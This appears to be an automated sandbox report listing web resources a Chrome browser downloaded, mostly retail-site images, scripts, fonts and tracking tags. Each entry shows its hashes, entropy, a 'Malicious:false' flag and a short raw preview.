                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://exlvbyrjblidltd8axayf86flp18cfom1tctxecdwbg0d3t7lc8gpq.ndshalox.com/hcmtfnjkrxwrlcxvzaqrziElYPHcYRIPTKQUPRBHAWNZOEBURUKKXUDLZWAFOJMGGFZSAGTHYKCD
                                                                                                                                                                                    Preview:1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 37288, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):37288
                                                                                                                                                                                    Entropy (8bit):7.994535351260621
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:RJggaXzb7cSbYMQaopiHOzhnZOzKXk+lsyu5lmBnkNJo4gNu:RJghzBsLpqOz5Ov+lsyuHgAPIu
                                                                                                                                                                                    MD5:DA92B857AF0793096E473E8D32A63C28
                                                                                                                                                                                    SHA1:15D39CBBB1FD9AB8CC38EE8E035DF74B1EEE5DB0
                                                                                                                                                                                    SHA-256:DE456A2B35EE1EDDCDBF28AD4769405E8E6FB182A61FCE6E57C9033D66651DA9
                                                                                                                                                                                    SHA-512:8A913FF12154ACBA05FC72613359D7BD9E584C13A8E334656AC4D714D6AC305D2CED10968931058FD6F8038750A0E44C5DB110AE455D8DD3AC34593A85F33AA7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/belltown-light-webfont.woff2
                                                                                                                                                                                    Preview:wOF2..................;........................?FFTM..*..*..>.`..V.<..e.....t..9.6.$..H..f.. ..2..k..|?webf.[..q...x.n....q...JdnS.7+.+.........Y.....s........g......I..*...Z[V../.vWT3>T..Dc8..y....H,;.....*2.1.....N..K.QK...Z~..4..m/x.....P0E.y.o.dC.....E.;..;...........{9(..s..[.=..5...12....=....Nh..s....7[...aM6".....;Yc.c|j.........(X....E.G.P.; Gd..Oh$.~u....On...+..?..0..*'..]Z.$]~.4u.._.X..r.4.n#...i..D..H..0j...1Vl.....c..%.-.R.B+`....*.......L..i....4.x.jg..?.P.x....:.NP......... u.R..Jmu.....<...V.YC...~DqPg./[..%..c.......OT..{....y./..%-...^.?f..s..s.M.i...........@,...EN.P;.^....K.+.B.#M...........X..z4...Eo.;.Gi%.%.3....;.GiJ+......gAlQ.t.....{..._.\.....x.B=.F.....G.-1.g-..$..........4...[.CH....K....4.k...5e94...8.<'..6....._........$...C...aN...t.|...!.+K}~....{/2..,..R..Ee<.....ed%....~.OJ.LJQ.!...V.A.......=..!...E0..w.Zj...J.r]+N..^...(....4..C......_t2~.5..........7.@o..]Q......C.P..u...M.w....H.. .....'......$....@G9..!'
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2203)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19691
                                                                                                                                                                                    Entropy (8bit):4.757167799122979
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Yxbm1/VTIfM+GrpIfD12nh6XB2JbcX/fM+GrpIfD12nh6XB2Jbs1:GvfDGrODYhg2JgvfDGrODYhg2JA1
                                                                                                                                                                                    MD5:5F1133E8094DEB965B9C619BEF832F25
                                                                                                                                                                                    SHA1:C104C27B6369C2523CBFB9029E48E58BC68D4F5B
                                                                                                                                                                                    SHA-256:E93849057F424BC259725D097296CDDFDF067C1D497A5BB70510E5E7DEF3B102
                                                                                                                                                                                    SHA-512:071BF9633AB3F9533CAF3631CAEC0268F0F92C842EDD7B1C986EB35AFC3FEBAFDC50CCF602D0F78E478EC59BFD20E241FF85842D7067AA3D910170056318AA96
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/content-cards.js?v=22895347363215955321730157903
                                                                                                                                                                                    Preview:class ContentCards extends HTMLElement{constructor(){super(),this.closeBtn=this.querySelector("#close"),this.body=document.querySelector("body"),this.refreshBtn=this.querySelector("#refresh"),this.refreshBtn&&this.refreshBtn.addEventListener("click",()=>{this.refreshBtn.querySelector("svg").classList.add("rotate"),this.refreshCards()}),this.closeBtn.addEventListener("click",this.toggleModal.bind(this)),this.cards,window.addEventListener("load",()=>{setTimeout(()=>{braze.subscribeToContentCardsUpdates(),braze.requestContentCardsRefresh(),this.cards=braze.getCachedContentCards().cards,this.cards.length>0?(this.renderCards(this.cards),this.querySelector("#refresh").classList.remove("hidden")):this.renderEmpty(),this.setBadge(this.getUnreadCardCount())},1e3)}),document.querySelector(".head-slot-bell").addEventListener("click",()=>{braze.logContentCardImpressions(braze.getCachedContentCards().cards),this.toggleModal()}),document.addEventListener("click",e=>{!e.target.closest(".content-cards
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1024x1024, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):245432
                                                                                                                                                                                    Entropy (8bit):7.999195270342684
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:YAkKGtPNob3XGuo0osQmyE1zf3K7TLDkiaKM7UU:Y3KGwrWmoV+zPE39rMwU
                                                                                                                                                                                    MD5:3B349530EF640A93CD099B9AC6A63873
                                                                                                                                                                                    SHA1:07E8B6373758E6B3BE914005A814CC25E28063E8
                                                                                                                                                                                    SHA-256:1F1BC5C27E7B3D7114C1374CD8B2E06F76B54FDAE5FF85CBA740DBC49D6BFD4A
                                                                                                                                                                                    SHA-512:342A9A5101DBE33981FFD09E7E86515B38B0FA0F07748C0DD7397FC1E3027C399DF66A37926183D558AC5524669DE37BE577564F727D310FD1F16CC0D44F567A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/e800570cf365c54c71508bc34d57a3b571160a56/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set.jpg?imwidth=900&impolicy=high
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .........*....>-..C!.! ....0..el^.qr..<..........WZ..?ov....f..]......#.W...?..................?......d.........C.....k....._.?....).7...'.O......m>...................?....K.................../............{|m...<.A...7.'.o....m................W...............G....m/...}@?..W....1.4...i.......o..._.?.......O{............F.y...?......'...'.....?y?..s.+...?.?........W...........k.........A.........G.............o....../.?....9.....o..._.?......s...o............7...?....s.............................~......O.....?.......................................z...........@.......?u.F,o..=....[.m.....3B..W.W....Y..~*Ex>[ug.Np.cs.=8./.*..q.p...<]..^.cDV.g.P...6........!`_..F...c.q...P<4:......>.4s-...."... .0.c...".....heRx.f...?.woQ(.p+.e......~.....Z.]q...LF......&...Gl..N.T.+....Am..I..../.GB.C..l..m3`>m.o=.../.....;K..2...~D..(..2v6.L6...`...U....)....suy...Z..o.ic.^.<.S.I...@.....x.hC\..E.....ss.....Wc.^..>..H.H.t..i......D....zj<M..u......n.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2139)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2140
                                                                                                                                                                                    Entropy (8bit):5.141103381880927
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:EGQIEvKlglnWSvOjAjQMjQklPE6Dy7sZl1U:EG+v6FS4AjXjpPESYsVU
                                                                                                                                                                                    MD5:B610A407E7105684FCA291AE126EE000
                                                                                                                                                                                    SHA1:52DABB9B2612EDC46EE150F13BBC71A1349EECD8
                                                                                                                                                                                    SHA-256:F68A24E652586F1F1A6EACBBBA232203787CCD0009FFC4CB990F3CDE37EE4930
                                                                                                                                                                                    SHA-512:59C5F2B434ECF6C193457CE588D52EC9317FF5248EC2AED7B279EF3952EFEB7424D7FF4BA025C13906BEE229457EF1685BE17ADE2CC343D7D501BC19F44D73D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useIsOriginatedFromShop.7toB9y1y.js
                                                                                                                                                                                    Preview:import{aO as m,at as o,q as l,kR as c,nn as p,bR as y,bk as v,d as f,br as g,y as b,a as w,bt as E,bo as h,j as M}from"./app.DfgMZONA.js";function I(){const e=m(),{directPaymentErrors:t,paymentLines:n}=o();return l((i,a)=>{if(Object.values(i).every(r=>r==null)&&!a)return;const s=n.peek().find(({method:r})=>r.type==="direct");if(s){const d=s.method.paymentMethodIdentifier;e.write(t.paymentMethodIdentifier,d)}e.write(t.number,i.number?{message:i.number,origin:"client"}:void 0),e.write(t.name,i.name?{message:i.name,origin:"client"}:void 0),e.write(t.expiry,i.expiry?{message:i.expiry,origin:"client"}:void 0),e.write(t.issueDate,i.issue_date?{message:i.issue_date,origin:"client"}:void 0),e.write(t.issueNumber,i.issue_number?{message:i.issue_number,origin:"client"}:void 0),e.write(t.verificationValue,i.verification_value?{message:i.verification_value,origin:"client"}:void 0),e.write(t.general,void 0)},[t,e,n])}function N(){const e=m(),{directPaymentErrors:t}=o();return l(()=>{e.write(t.payme
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1610x894, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):37524
                                                                                                                                                                                    Entropy (8bit):7.994110882918855
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:IasWTpjEi5Sb33eBSuVWRIF+Ogk3GVmg+JlU0Jf/:Iat15SDOku4IFSkWVspf/
                                                                                                                                                                                    MD5:5A7ECF7B0982C3728EF00F5184ECD63E
                                                                                                                                                                                    SHA1:8BB94952C61E8BB82B50AE770ED6ACA51911DC87
                                                                                                                                                                                    SHA-256:F6D4C220DBA930370D15626A605407EB16BDACA69243554E81D10BB6AF018430
                                                                                                                                                                                    SHA-512:37A3580C6D16C2642512E973F12993D7C04CEFE46CCFCA218413D1BA7C931A7A293C69FB34BD3599FCAB81E9F97D4BC49378E32869F643A53096FA08DD570D26
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10162024-MOPS-V3LazyLoad.jpg
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .....]...*J.~.?%..X.)?.#....$.gn....O...4...J.....<..o..].......Dx..q.....^k..B?.5...].....C.>k.a....o....4...7.?.95....~..C._7.!...._...>.M.........).z....B.#..!...StYy.}H..7.[......g..G=G..Y..o.\.cm...1.. .g&:..+RN..-.GR....zV`.*....f..s.....I...z18.9.+..V....B...6iY....@..b.r.wK[.M.mL...r..:....'..../."x!...$..<...qa.%.. .H......Xi8...j.....m..R=......{0..c.9..E..1...F..j...?....<._..w}!.|Z.0'.[.....J....s..d.Vj.|.w....*s.A....[HL.d..K..........1.)..x...J?3.A.qi}./.\.cfB.<{...|..L..=.L......v.....n:[."0.C.h.....H.m%..e8c.F,..D...^.D0R.s...0.Y.......u.?P.RV..\...1.;..,w.1."mK....i..p...s..2Gcl6..;.A...?.wY.N.,.V.*.J.a..K`..\._....J\Z.lwLBOGl..'"D..v}.;!...W...V73...&..pnoV.9..MQ...B.d.=..........@D.j.3....Q.A*Q......A..l...i.|h....|..a..67....U. .l.a.zO..u..U.....t..W.e.....{Y.../.*q...6............^HH.....*..K-KW...]Sv.NZ.6z..].....S...~(S....x..8..~.....h.._.....f...M..('.kj....~>%..RC.F.=<.7.........`9q....$..X<.`j..n.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):25135
                                                                                                                                                                                    Entropy (8bit):4.706047497502984
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:0CTY9KkSfg1PjXo8thNlafuY2IojXzQ1UUzAQ1UUzsx7W:M2fgSSmMC
                                                                                                                                                                                    MD5:5DFEA97A69D86F8D0AC11F1E442B42AE
                                                                                                                                                                                    SHA1:B0B7C8E751751F480D9D1B9C09D36138E14F7B1D
                                                                                                                                                                                    SHA-256:C70080425C7F3115D6F686BBF73A336D1DD283479C0357CFB14F7DBCEF374D15
                                                                                                                                                                                    SHA-512:357589765F913BCF77E0F7E60A073CDDB05ECCB6AFE355A46DA28412C8F13DC0E8B574EEF631CFC5A63EA93DD3D967FAFD1F25F4AD440E24EF9374DE2D074610
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://unpkg.com/tapcart-capture-kit@0.3.0/dist/embed.js
                                                                                                                                                                                    Preview:function noop() {.}.function assign(tar, src) {. for (const k in src). tar[k] = src[k];. return tar;.}.function is_promise(value) {. return value && typeof value === "object" && typeof value.then === "function";.}.function run(fn) {. return fn();.}.function blank_object() {. return /* @__PURE__ */ Object.create(null);.}.function run_all(fns) {. fns.forEach(run);.}.function is_function(thing) {. return typeof thing === "function";.}.function safe_not_equal(a, b) {. return a != a ? b == b : a !== b || (a && typeof a === "object" || typeof a === "function");.}.function is_empty(obj) {. return Object.keys(obj).length === 0;.}.function null_to_empty(value) {. return value == null ? "" : value;.}.let is_hydrating = false;.function start_hydrating() {. is_hydrating = true;.}.function end_hydrating() {. is_hydrating = false;.}.function upper_bound(low, high, key, value) {. while (low < high) {. const mid = low + (high - low >> 1);. if (key(mid) <= value) {. low = mid
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1183
                                                                                                                                                                                    Entropy (8bit):4.744543657452427
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfhafr6LRcLiRoLVNqLvqBELVFWLcg6pLgjgOLtAVLVyLV:YBsGLqLNLVkLaELVgLc1pLqfLQL0LV
                                                                                                                                                                                    MD5:89E9CE503ECD79EF18B0EA70B696EB1C
                                                                                                                                                                                    SHA1:102B2348D55ABBA81865AB4BF56AF7321DD7AC21
                                                                                                                                                                                    SHA-256:BDCEC8A9A7CE1B4AAAE4B4BFC371539597C64BD58E0945DE11C630BD60B42075
                                                                                                                                                                                    SHA-512:68B38BA0924958C871FA34C6328E014AF240FF5F116F2CD472C63A99DE37EC92E6C95BA64DE66140C4AE7AABA8F7CC808B1524595696620ECC844547E69929C4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"34310906","rollup":{"average_rating":4.45,"rating_count":118,"review_count":118,"answered_questions":0}},{"page_id":"33962809","rollup":{"average_rating":4.56,"rating_count":124,"review_count":124,"answered_questions":0}},{"page_id":"34061828","rollup":{"average_rating":4.84,"rating_count":214,"review_count":214,"answered_questions":0}},{"page_id":"34997851","rollup":{"average_rating":4.5,"rating_count":26,"review_count":26,"answered_questions":0}},{"page_id":"37507431","rollup":{"average_rating":4.79,"rating_count":28,"review_count":28,"answered_questions":0}},{"page_id":"36638221","rollup":{"average_rating":4.55,"rating_count":11,"review_count":11,"answered_questions":0}},{"page_id":"37701856","rollup":{"average_rating":4.33,"rating_count":12,"review_count":12,"answered_questions":0}},{"page_id":"38319678","rollup":{"average_rating":4.2,"rating_count":10,"review_count":10,"answered_questions":0}},{"page_id":"9621326","rollup":{"average_rating"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):39684
                                                                                                                                                                                    Entropy (8bit):7.983274198351266
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:y/60xz7Q9OQx+ZrwPQuSak5Tyoqd+HkKx8JCyf3TG0b7DjX8:4Rxz7Q0QMZrGQuSH5Tjki8Rbls
                                                                                                                                                                                    MD5:BDE867E71C970766598D4D06D0D1F629
                                                                                                                                                                                    SHA1:78FE206749CB06DB97AC1ECACD6C015E4685543E
                                                                                                                                                                                    SHA-256:136AE5A9400C9318E36CAA8F9122F0E9090F6656BC25BF1622FFD62AF73866FE
                                                                                                                                                                                    SHA-512:D927FA801BE09C78D28D1929544D9A2CC32C8D3F4221E63DCECF16733B255A055D7B3EDC88813F1989152D0E235B245EFC42F97DB207D2FE38767D817D949371
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10212024-MOPS-2_SWB_Desktop.jpg?v=1729531877&width=650
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(......m..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 l...0....*..n.>9..C.!..|.| .....On.$.% m,....*..9.s.;.vS........d......|..........s..........v.......o......`>W.^.3.....................5...+../._....w...X.)...w.....?....K.......7.....Oc.._.?..a...y.q...........?......,....................?~=....o...6......_..............~......K.?........?..........o...^6.(.....G..............3.o..?..........U...O....v.U.........E.._........i.s..............O......._.....'........?.?.~..\.#......A...i...+........z...........c..........d .]....Gv....s.....R..c...9.b..v)Q.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1048)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2495
                                                                                                                                                                                    Entropy (8bit):5.2908819638062585
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:FJ1az2WNX6IMj5wB/tOQ2KaHQJUGVj9suV3tpYFxmwUnhZEa3:FJ174XejuB/aKaHQJUGB9suVobuhSa3
                                                                                                                                                                                    MD5:FAAE03EB623AF7C8223DEAC19713146D
                                                                                                                                                                                    SHA1:3B49BAFA4B90344AB8F5AB66AA53F9B17D8DFC70
                                                                                                                                                                                    SHA-256:C4CBC36C526887751F0EEDECBE9B048CF0A8E5E580D46ED5D869D9C2C2A32E33
                                                                                                                                                                                    SHA-512:B08F35494844929C9348B5059140322B27D57F8D46C0488BCA065940CA15804F8B65002FE1FDEA1A7C9E4A37807B4AA17AD94775AE4896D7173CE489E99F1411
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview://tealium universal tag - utag.129 ut4.0.202409301659, Copyright 2024 Tealium.com Inc. All Rights Reserved..try{(function(id,loader){var u={};utag.o[loader].sender[id]=u;if(utag===undefined){utag={};}if(utag.ut===undefined){utag.ut={};}if(utag.ut.loader===undefined){u.loader=function(o){var a,b,c,l;a=document;if(o.type==="iframe"){b=a.createElement("iframe");b.setAttribute("height","1");b.setAttribute("width","1");b.setAttribute("style","display:none");b.setAttribute("src",o.src);}else if(o.type==="img"){utag.DB("Attach img: "+o.src);b=new Image();b.src=o.src;return;}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";b.src=o.src;}if(o.id){b.id=o.id;}if(typeof o.cb==="function"){if(b.addEventListener){b.addEventListener("load",function(){o.cb();},false);}else{b.onreadystatechange=function(){if(this.readyState==="complete"||this.readyState==="loaded"){this.onreadystatechange=null;o.cb();}};}}l=o.loc||"head";c=a.getElementsByTagNa
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                    Entropy (8bit):4.631719675811568
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnB7QabcOfeIRM2JaJXr364aJEizQVQsLVn:YWtIkW/fAnB7bcOGIRM2J+r5HLVn
                                                                                                                                                                                    MD5:801A3C29D068B83D96B316DBE66A53D2
                                                                                                                                                                                    SHA1:59EC5C0C0E053F6893E4AB32D909130D8BD7729A
                                                                                                                                                                                    SHA-256:AB90CA796A8FF1046911CEBB787ED512598F3A435EB34738CCA8D7F8736F34F4
                                                                                                                                                                                    SHA-512:D057006E82F30555160B75A471DC4E37F127D99AE5E307757C8FD6F2EDC5D641E92DB3C9DD8A198B30B500BF3C0481CF23A965887FA6DE3D64C47299EB88C106
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"39885007","rollup":{"average_rating":5.0,"rating_count":1,"review_count":1,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5991)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):274908
                                                                                                                                                                                    Entropy (8bit):5.569781801324632
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:lQuwiztGbETravody055CptDY8/I8+yU/OUYhcDmKD0C8Gp/36l:BGbg+vonMYGUTx0C8Gp/3S
                                                                                                                                                                                    MD5:F3743124964EA3A4EAC81FA6A2249D6F
                                                                                                                                                                                    SHA1:98BC698611DACE54AF99D977093AE10864904956
                                                                                                                                                                                    SHA-256:4E3DF174B958C71360CAAEA531A5029EF8BD6B9A804397DF8FAD1BFA8E2855EB
                                                                                                                                                                                    SHA-512:7C210BF8D9F996006AE86922BF8AFF8F89372C7C73337A1CF154D90A21BC42E47412B8F9964580000548B83969A731D7BCE4D07DF1E5F9C6D8BF6566537A41E7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=AW-1069816607&l=dataLayer&cx=c
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_auto_events","priority":21,"vtp_enableScroll":true,"vtp_enableOutboundClick":true,"vtp_enableDownload":true,"vtp_enableHistoryEvents":true,"vtp_enableForm":true,"vtp_enableVideo":true,"vtp_enablePageView":true,"tag_id":9},{"function":"__ogt_cross_domain","priority":21,"vtp_rules":["list","bedbathandbeyond\\.ca$","bedbathandbeyond\\.com$"],"tag_id":11},{"function":"__ogt_ads_datatos","priority":21,"vtp_instanceDestinationId":"AW-1069816607","tag_id":22},{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 267x267, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):894
                                                                                                                                                                                    Entropy (8bit):7.710968568341133
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:DZkX8oGgwTjW6pwqtREHsRLPSd7/t/hHW1W8DSokrG:D2MohaSEfpPSdV/hHW1W8DSoka
                                                                                                                                                                                    MD5:EA0DB80827F76D790BACDE2E991452BC
                                                                                                                                                                                    SHA1:0E8A0609EE4C169B3F69E1636583E732E7E0DEE7
                                                                                                                                                                                    SHA-256:BE5D7DE78C32A4E14A50DA8EA1B17F69DFF7BF68D5CCDDC86F58D51A2B40593F
                                                                                                                                                                                    SHA-512:4A57E97412DE88D4DDF5CD5BC484872B0D56DAB7F77C31EC3F00B4D0E138316AA4B163E7C33BE1DE1718BD72A5634FCB55F4271D1826A79F983DB4D0B9B595D9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/03232020-furniture-otherPopular12.jpg?imwidth=200?imwidth=1920
                                                                                                                                                                                    Preview:RIFFv...WEBPVP8 j....)...*....?%..X.*..'2x..$.gn.k@B.,.f..bt8.. .rT..,8..A(.#.Xq?$.Q.O..0A......].D.et.g=...y.t........$.o.0..K_..F..,.usR..f>,.v...+....E.m..>~=.=Z../..M..J......J.e9.s....W....K.A.m<.=..... \...y...(...... ..R9.y'...6...?.i%.%@....H>.7...F.Z.W.S..2..3.i.Q......=..w...=:...).Y..gw..#.A..`..[....BG..{}.?.q.c.Xqv.....Xq?_6,8.............U...#.\....)cW.....[.jY."~LQ...[.v.z9...}.'=.....<.I.l......6.k&.#..=.}a..?..}.......:....l91&.......+q.l.......&9...}....#....p........:.HIHF...z........m....[Y.yt..2.....2...V..x7..b.K.D..3.:..vZ.......z..o..A..N.aQ.....R(m.....@Z..C#.....m.Z[].......#]#..n.7oH?okE..W4.......0.].;u.b....k....,..j.k.0...{...,6.....b..'....T..-5.....\..w...n...u8._......c.].>.Ju.........4..-D...u.< ...A..kz....>../...)$..HZX.....;TO..'0.oa2GGW..2.I...uy.!P..6....t}.%....V....=.B..5MH...t.Z...Sq.7mny#....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1033
                                                                                                                                                                                    Entropy (8bit):4.9055749198625
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:fubU3lz0VrP+Zz0UzZz0KVsz0jz07z0h5z0jOYmwJ8:fubU1zuGZz3ZzBVszqz2zC5zEOrm8
                                                                                                                                                                                    MD5:8360EB270B919A1FB4776BC448D9ED14
                                                                                                                                                                                    SHA1:C0D249A8D232C6A98326C1AEC0F0B38991ED77B0
                                                                                                                                                                                    SHA-256:E92913C2B11FC1E9E7C4F84628362D1C9660E7F7E88904D124C9EBBBEF9D4E48
                                                                                                                                                                                    SHA-512:AEECC427FAE194F0BFCCCC864867AC16B2BADD3814B76806D7D899B07B6D8D394A838D56A1EB4F637D1DB1B2AC8D34588E4AA7453D00492F3C5EFDEC89B0BE63
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://use.fontawesome.com/7f85a56ba4.css
                                                                                                                                                                                    Preview:/*!. * Font Awesome v4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */.@import url('//use.fontawesome.com/releases/v4.7.0/css/font-awesome-css.min.css');./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.eot');. src: url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.eot?#iefix') format('embedded-opentype'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.woff2') format('woff2'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.woff') format('woff'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.ttf') format('truetype'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.svg#fontawesomeregular') format('svg');. font-weight: normal;. font-style: norma
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1636
                                                                                                                                                                                    Entropy (8bit):4.534163900714585
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:td3Dut0peWkCN9MMwcgX+bAhlrk5d0JQFcNep4cmMVuvqirlx354KQ9veALYpgKQ:7kjukhlI5wAcevjirPJ4BvnLYCK6z
                                                                                                                                                                                    MD5:46D25A9947AAE9BA68710B992F255AF3
                                                                                                                                                                                    SHA1:EDCA889AE91AA73E0CDEC2DC3DD61DCF9CB3C9C8
                                                                                                                                                                                    SHA-256:268795694568CE04C852FB67AFE7E6C7D061803470D33B7BF70456D5FFAB8088
                                                                                                                                                                                    SHA-512:BDA254E8E25E4A9C2A46E3EC2F5F1E2A056102361CB2A6B13C4979CE512F4A931B52649BDEFC5A7AA84E9F9790204390E55689092A61736EA878DECB62DC0E1C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/20240325-BBB-Icon.svg
